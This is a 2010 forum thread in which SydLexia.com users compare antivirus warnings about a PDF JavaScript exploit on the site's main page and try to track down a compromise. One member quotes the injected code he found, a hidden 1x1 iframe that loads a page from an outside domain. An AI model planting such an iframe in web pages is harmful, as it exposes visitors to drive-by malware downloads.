SydLexia.com - The Forums :: View topic

Joined: Oct 19 2009 Location: Nashville, TN Posts: 1479

The last few times I've come to sydlexia.com, my Norton Internet Security freaks out about a temporary flash plugin that it suspects might be a high level threat. This only happens when I come to sydlexia.com. Has anyone else had experience with this? If it is at all meaningful, the potential threat is named plugin-typenow.swf, which brings up nothing on google.

Posted: Jan 24 2010 02:32 pm

Never had that one, but my pop up blocker likes to block the you have new messages feature.

UsaSatsui's Youtube Channel · Posted: Jan 24 2010 05:20 pm

I'm having Avast pick this up too.

1/24/2010 9:39:04 AM Valued Customer 1496 Sign of "JS:Pdfka-gen [Expl]" has been found in "C:\DOCUME~1\VALUED~1\LOCALS~1\Temp\plugtmp-63\plugin-oneThis.pdf" file.

I only got it twice, both in the morning around 9:30, both when I went to the main page.

EDIT: I did some searching around. It's a Javascript exploit (which probably any idiot who noticed the "JS" could have told you), it downloads other malware remotely once it hits your PC, and it's one that apparently has caused false positives on Avast before. It also doesn't seem to trigger in the evening. So...

Joined: Aug 04 2009 Posts: 2515

That's weird... I have been getting one too.

It gives some website URL but i just ignore it.

Posted: Jan 24 2010 06:52 pm

I'm picking this up as well from AVG on the main page.

Posted: Jan 24 2010 07:05 pm

I went to the main page and didn't get anything. I was only on it for a few seconds, though.

Title: Titlating Joined: Dec 17 2007 Posts: 5042

Yeah avast picked it up for me.

Posted: Jan 24 2010 09:11 pm

Goddammit. Is it happening on any pages besides the main page?

Banned Joined: Sep 13 2008 Posts: 3129

hm... I was going to suggest maybe its detecting the javascript used for the "super C" easter egg but if it was why didnt it happen until today

Joined: May 22 2008 Location: Goshen, VA Posts: 6544

I only saw it pop up on the main page.

Posted: Jan 24 2010 09:24 pm

Is it gone? If so, I don't know why. I didn't do anything. But my computer tried to DL some sort of PDF when I went to the main page. Then I opened it in Dreamweaver and couldn't find any malicious code. Then I went back to the main page and it seemed fixed...

UsaSatsui's Youtube Channel · Posted: Jan 24 2010 09:28 pm

It seems like it's not something that happens every time.

Posted: Jan 24 2010 09:30 pm

You guys can double check, but there's nothing in the index.html file that should be doing it. I just overwrote the HTACCESS file as well, in case someone had fucked with that.

Joined: May 22 2008 Location: Goshen, VA Posts: 6544

It doesn't seem to be popping up anymore. I saw it only once and that was today around lunchtime.

Posted: Jan 24 2010 09:58 pm

I'm freaked out now. Did whoever hacked it change it back? Did my webhost fix it? Was it a problem with the webhost to begin with?

I've changed my FTP user/password YET AGAIN just to be safe...

2011 SNES Champ Joined: Dec 04 2006 Posts: 1929

AVG found something on the news page. Unfortunately, it's in German because I don't know how to change it, so I don't know what it was.

Posted: Jan 24 2010 11:34 pm

I went to the page at around 7:00, everything seemed A-OK. Is it just me, or does it seems like the site's been getting a lot of viruses lately? I don't remember it being this bad before.

UsaSatsui's Youtube Channel · Posted: Jan 24 2010 11:37 pm

I'm not getting anything, but when I go to the main page, it's kicking me down to the bottom of it.

Title: Hugh Joined: Sep 23 2007 Posts: 1591

Yeah, that happened to me, too. I'm not picking up any viruses, though.

Banned Joined: Sep 13 2008 Posts: 3129

UsaSatsui wrote:

I'm not getting anything, but when I go to the main page, it's kicking me down to the bottom of it.

Same here

EDIT: Theres a small square at the bottom of the main page and this is the source for it
<iframe src="http://todaylost.com/sv/index.php" width="1" frameborder="1" height="1"></iframe>

Banned Joined: Sep 13 2008 Posts: 3129

Oh it should be noted that that code is at the bottom of the HTML code for the main page

Joined: Oct 19 2009 Location: Nashville, TN Posts: 1479

I also am being shot down to the middle of the page and looking at a small grey square. I'm not getting any warnings from Norton, though.

Banned Joined: Sep 13 2008 Posts: 3129

I shot Syd a PM of what i found and it seems to be fixed

Posted: Jan 25 2010 01:38 am

Hacker wrote:

I shot Syd a PM of what i found and it seems to be fixed

You know, for all the shit-talking that Hacker goes through, he seems to me one hell of a wiz at situations like this, if it really is fixed.

Title: Hugh Joined: Sep 23 2007 Posts: 1591

Isn't fixed for me, and as we've already established, it seems to randomly not happen, sometimes.